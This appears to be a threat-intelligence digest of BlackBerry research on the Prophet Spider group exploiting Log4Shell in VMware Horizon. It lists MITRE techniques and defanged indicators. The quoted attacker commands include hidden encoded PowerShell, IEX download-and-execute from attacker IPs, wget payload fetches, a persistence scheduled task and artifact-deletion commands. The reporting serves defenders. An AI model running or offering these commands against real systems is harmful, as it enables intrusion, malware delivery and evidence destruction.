Threat Research

Log4U, Shell4Me

Securonix

BlackBerry researchers link the Prophet Spider Initial Access Broker (IAB) group to exploiting the Log4j (Log4Shell) vulnerabilities in VMware Horizon to break into organizations. The article outlines IoCs, observed post-exploitation payloads (cryptomining, Cobalt Strike beacons, webshells), and recommended mitigations to help defenders detect and respond. #ProphetSpider #Log4Shell #VMwareHorizon #PowerShell #CobaltStrike #VMBlastSG #wget.bin

Keypoints

  • Prophet Spider IAB operated in the Log4Shell window, exploiting CVE-2021-44228, CVE-2021-45046, and CVE-2021-44832 in VMware Horizon proxying through Log4j.
  • Exploitation was detectable by monitoring ws_TomcatService.exe child processes, with child processes spawning cmd.exe or powershell.exe.
  • Post-exploitation activity commonly used encoded PowerShell commands to download a second-stage payload, enabling cryptomining, ransomware, or extortion.
  • Threat actors used PowerShell download methods (System.Net.WebClient) and also curl/WSL bash to fetch payloads, sometimes via IEX-based techniques.
  • Cryptocurrency miners were frequently deployed; Cobalt Strike beacons were also observed, sometimes launched via rundll32.exe.
  • Persistence and backdoors included Scheduled Tasks and webshells (absg-worker.js) injected into VMBlastSG services, with cleanup actions to hide traces.
  • Prophet Spider commonalities included specific temp folders (C:WindowsTemp7fde), wget.bin usage, and use of download IPs/domains associated with known actors.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of the Log4j vulnerabilities in VMware Horizon to gain initial access. – [“The BlackBerry Research & Intelligence and Incident Response teams have found evidence correlating attacks by Prophet Spider with exploitation of the Log4j vulnerability in VMware Horizon.”]
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Encoded PowerShell commands used to download the second-stage payload. – [“encoded PowerShell commands to download a second-stage payload.”]
  • [T1105] Ingress Tool Transfer – Downloaded payloads via WebClient/DownloadString or curl-based downloads. – [“PowerShell’s System.Net.WebClient… DownloadString, DownloadData, or DownloadFile methods.”]
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Use of cmd.exe to launch PowerShell and other commands. – [“cmd /C ‘powershell -NonI -W Hidden -NoP -Exec Bypass -Enc ‘”]
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Use of WSL bash to execute downloaded content. – [“the attacker then attempted to execute the downloaded content using the Windows Subsystem for Linux (WSL) bash utility.”]
  • [T1496] Resource Hijacking – Deployment of cryptocurrency mining software on infected hosts. – [“BlackBerry researchers observed the threat actors installing cryptocurrency mining software on the affected systems.”]
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – Beacon payload spawned via rundll32.exe. – [“beacon payload would spawn either a 32- or 64-bit version of rundll32.exe containing the beacon payload.”]
  • [T1505.003] Web Shell – Webshell injected into absg-worker.js and VMBlastSG service manipulation to enable attacker access. – [“webshell file was injected into absg-worker.js…”]
  • [T1082] System Information Discovery – Enumerating basic network and domain information. – [“the attacker began their attempts to enumerate basic information about the network and domain.”]
  • [T1552.001] Credentials in Registry – Credential harvesting from the registry. – [“harvest credentials from the registry.”]
  • [T1105] Ingress Tool Transfer – Additional downloads (ve.bin, winntaa.exe) via wget.bin progression. – [“wget.bin -t 1 hxxp://149.28.200[.]140:443/ve.bin … winntaa.exe”]
  • [T1105] Ingress Tool Transfer – Multiple downloads from remote hosts (wget.bin, xms.ps1, drv, etc.). – [“wget.bin -t 1 hxxp://149.28.200[.]140:443/wget.bin”; “IEX ((New-Object System.Net.WebClient).DownloadString(‘hxxp://185.112.83[.]116:8080/drv’))”]
  • [T1053.005] Scheduled Task – Creation of a scheduled task for persistence/C2 and configuration storage. – [“C:Windowssystem32schtasks.exe /create /F /sc minute /mo 1 /tn BrowserUpdate /tr …”]
  • [T1070.004] File Deletion / Clear Windows Artifacts (Defense Evasion) – Cleanup actions deleting artifacts like voiding traces and deleting files/tasks. – [“del /f /q C:ProgramData…”,”schtasks /delete /tn * /F”]

Indicators of Compromise

  • [File Path] context – c:windowssystem32configsystemprofilemimunssm.exe, c:windowssystem32configsystemprofilemimu2nssm.exe, c:windowssystem32configsystemprofilemimuxmrig.exe
  • [File Path] context – c:windowstempwinntaa.exe, c:windowstempwget.bin, C:Windowssystem32configsystemprofileAppDataRoamingnetwork02.exe
  • [URL] context – hxxp://149.28.200[.]140:443/wget.bin, hxxp://149.28.200[.]140:443/winntaa.exe
  • [URL] context – hxxp://80.71.158[.]96/xms.ps1, hxxp://185.112.83[.]116:8080/drv, hxxp:// api.rogerscorp[.]org:80
  • [IP/Port] context – 149.28.200[.]140:443, 185.112.83[.]116:8080, 198.23.214[.]117:8080
  • [Domain] context – b.oracleservice[.]top, api.rogerscorp[.]org
  • [File] context – xms.ps1, wget.bin, absg-worker.js, dd.ps1, 2.ps1
  • [IP] context – 138.68.246[.]18, 140.246.171[.]141, 167.114.114[.]169

Read more: https://blogs.blackberry.com/en/2022/01/log4u-shell4me

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint